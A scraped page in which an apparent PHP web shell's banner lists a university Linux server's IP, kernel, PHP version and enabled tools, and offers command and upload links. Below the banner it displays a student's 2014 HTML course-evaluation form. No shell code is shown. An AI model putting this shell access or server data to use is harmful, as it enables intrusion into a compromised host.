Server IP : 172.16.15.8 / Your IP : 18.217.224.165 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/cngray/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!--- Corey Gray CS 480 DUE: April 7, 2014 Have a page with two links first link will have an input page for information to the table second link will show the table with updated information --> <center> <h2> Input Your Information </h2> <hr> <font color = blue size = 4> <form action = Assignment6Table.php method = post> <font color = black size = 5> COURSE: </font> <input type = text size = 5 name = course><br><BR> <font color = black size = 5> GENDER: </font> <input type = radio name = gender value = MALE>MALE <input type = radio name = gender value = FEMALE>FEMALE<br><BR> <font color = black size = 5> GRADE: </font> <input type = radio name = grade value = FRESHMAN> FRESHMAN <input type = radio name = grade value = SOPHMORE> SOPHMORE <input type = radio name = grade value = JUNIOR> JUNIOR <input type = radio name = grade value = SENIOR> SENIOR <BR><BR> <font color = black size = 5> HOW UNDERSTANDABLE WAS THE CLASS?</font><BR> <input type = radio name = q1 value = 2> GOOD <input type = radio name = q1 value = 1> AVERAGE <input type = radio name = q1 value = 0> POOR <BR><BR> <font color = black size = 5> HOW PREPARED WAS THE TEACHER FOR THE CLASS?</font><BR> <input type = radio name = q2 value = 2> GOOD <input type = radio name = q2 value = 1> AVERAGE <input type = radio name = q2 value = 0> POOR <BR><BR> <font color = black size = 5> HOW PREPARED WERE YOU FOR THE CLASS?</font><BR> <input type = radio name = q3 value = 2> GOOD <input type = radio name = q3 value = 1> AVERAGE <input type = radio name = q3 value = 0> POOR <BR><BR> <P> <HR> <center> <input type = submit value = "Click to Submit"> <input type = reset value = "Click to Reset"><BR> <A HREF = Assignment6.html> TO HOME PAGE. </a><br> <A HREF = Assignment6ShowTable.php> TO TABLE PAGE. </a><P> </form> </center>